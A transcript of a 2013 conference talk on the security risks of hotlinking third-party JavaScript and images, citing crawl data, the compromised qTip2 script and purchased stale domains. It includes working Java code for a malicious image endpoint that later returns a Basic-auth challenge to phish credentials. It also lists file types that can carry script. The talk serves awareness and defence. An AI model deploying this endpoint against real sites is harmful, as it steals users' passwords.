Hotlinking is Too Hot for Comfort

Presentation given at GeekMeet in Stockholm, January 2013. Covers the risks of hotlinking JavaScript and images into your websites.


  1. Hotlinking is Too Hot for Comfort, @johnwilander, GeekMeet Stockholm 2013
  2. Hotlinking ==
     <img src="http://3rdparty.net">
     <script src="http://3rdparty.net"></script>
  3. The Paper: "You Are What You Include" by Nikiforakis et al.
     http://seclab.cs.ucsb.edu/media/uploads/papers/jsinclusions.pdf
  4. Crawled
     • Alexa Top 10,000
     • Up to 500 pages per domain
     • 3,000,000+ pages in total
  5. (image-only slide)
  6. Sites typically hotlink JavaScript from 5-15 remote hosts
  7. If I can run a script on your site or app, what can I do?
  8. Browser Exploitation Framework, http://beefproject.com/
  9. So, who is able to run scripts on your site?
  10. Most hotlinked scripts in the Alexa Top 10,000 (from the paper):

      Service                            Script (.js)                                       % of Alexa Top 10,000
      Web analytics                      www.google-analytics.com/ga.js                     68.37%
      Dynamic Ads                        pagead2.googlesyndication.com/pagead/show_ads.js   23.87%
      Web analytics                      www.google-analytics.com/urchin.js                 17.32%
      Social Networking                  connect.facebook.net/en_us/all.js                  16.82%
      Social Networking                  platform.twitter.com/widgets.js                    13.87%
      Social Networking & Web analytics  s7.addthis.com/js/250/addthis_widget.js            12.68%
      Web analytics & Tracking           edge.quantserve.com/quant.js                       11.98%
      Market Research                    b.scorecardresearch.com/beacon.js                  10.45%
      Google Helper Functions            www.google.com/jsapi                               10.14%
      Web analytics                      ssl.google-analytics.com/ga.js                     10.12%

  11. (same table)
  12. (same table, with callouts)
      • ga.js and urchin.js are two different versions of Google Analytics => probably not on the same site.
      • 68.37 + 17.32 ≈ 85% of Alexa Top 10,000
      • Please don't be evil, Google.
  13. (image-only slide)
  14. 2011-12-08 there was an issue reported: https://github.com/Craga89/qTip2/issues/286
  15. "sends your browser agent and another piece of info"
  16. "old Wordpress install … security vulnerability"
      "infected nearly all JS files on my site"
  17. "The offending scripts have been removed as well as the Wordpress blog"
      "cronjob setup that checks for changes"
      "Closed"
  18. Comment: "it downloads some other exploits"
  19. One month later … https://github.com/Craga89/qTip2/issues/286
  20. "issue is still present"
  21. "Looks like the security hole wasn't plugged after all"
      "Please … do not hotlink"
      "Reopened"
  22. "I've disabled the Wordpress blog on my site"
      "Closed"
  23. Questions on the qTip hack
      • How many end user PCs were trojanized?
      • How many passwords stolen?
      • How many credit card numbers stolen?
      • How many internet bank logins remote controlled?
  24. Stale Hotlink Domains
  25.-27. (diagram, built up over three slides) Sites in the Alexa Top 10,000 hotlink from hosts inside the Alexa Top 1,000,000 … and from other domains outside it … some of which are stale domains, open for purchase.
  28. The Stale Numbers
      • 3,000,000+ pages crawled
      • 4,225 hotlinked domains outside Alexa Top 1,000,000
      • 50 domains stale, i.e. no longer registered
  29. Nick et al. purchased two of those stale domains
  30.-33. (diagram and table, built up over four slides)
      Stale domains: hbotapadmin.com, blogtools.us
      Hotlinked by, in the Alexa Top 10,000: hbo.com, goldprice.org … and 23 less popular sites

                           blogtools.us   hbotapadmin.com
      Visits (15 days)     80,466         4,615
      Including domains    24             4
      Including pages      84             41
  34. The Case of the Unauthorized Image
  35. "Hotlinked images, can they bite me too?"
  36. OK, this might be bad:
      <script src="http://3rdparty.net"></script>
      But this?
      <img src="http://3rdparty.net">
  37. (image-only slide)
  38. What if Meetup allowed profile images to be hotlinked?
  39. Meanwhile, at the Attacker's Server …
  40. Including images typically looks like this in a web app project:
      src/main/webapp/
        css/…
        img/thumb_john.jpg
        js/…
        html/…
      But an attacker could instead resolve that image URL in code, like this …
  41.-42. The attacker's JAX-RS endpoint serving the "profile image" (shown twice; slide 42 calls out the returnUnauthorized branch as "adding some nasty, alternate behavior"). The slides show only the fields and the method; the imports, the enclosing resource class and the comments are added here so it compiles:

      import java.awt.image.BufferedImage;
      import java.io.ByteArrayOutputStream;
      import java.io.IOException;
      import javax.imageio.ImageIO;
      import javax.servlet.ServletContext;
      import javax.ws.rs.GET;
      import javax.ws.rs.Path;
      import javax.ws.rs.Produces;
      import javax.ws.rs.core.Context;
      import javax.ws.rs.core.Response;

      @Path("/")  // root resource assumed; the slides show no class
      public class EvilImageResource {
          // Slide 41 uses "/img/thumb_john.jpg", slide 42 "/images/thumb_john.jpg".
          private static final String IMG_PATH = "/img/thumb_john.jpg";
          // static: JAX-RS creates a resource instance per request by default, so an
          // instance field could never stay flipped. The attacker flips it once the
          // image is embedded in the victim site.
          private static volatile boolean returnUnauthorized = false;

          @GET
          @Path("/thumb_john.jpg")
          @Produces("image/jpeg")  // slides say "image/jpg"; "image/jpeg" is the registered type
          public Response getEvilImage(@Context ServletContext context) {
              if (returnUnauthorized) {
                  // 401 + WWW-Authenticate: Basic makes the browser pop a credential
                  // dialog while the user is looking at the site that hotlinks the image.
                  return Response.status(Response.Status.UNAUTHORIZED)
                                 .header("WWW-Authenticate", "Basic").build();
              } else {
                  try {
                      // Serve a perfectly ordinary thumbnail until the flag is flipped.
                      BufferedImage image = ImageIO.read(context.getResourceAsStream(IMG_PATH));
                      ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
                      ImageIO.write(image, "jpg", outputStream);
                      byte[] imageData = outputStream.toByteArray();
                      return Response.ok(imageData).build();
                  } catch (IOException e) {
                      e.printStackTrace();
                      return Response.serverError().build();
                  }
              }
          }
      }
  43. (image-only slide)
  44. Now what will John Doe enter?
  45. Some more nails for the coffin …
      • CSS files can execute JavaScript (expressions in IE6-7 and XBL in Firefox)
      • SVGs can execute JavaScript
      • GIF files can be edited to become executable JavaScript and HTML
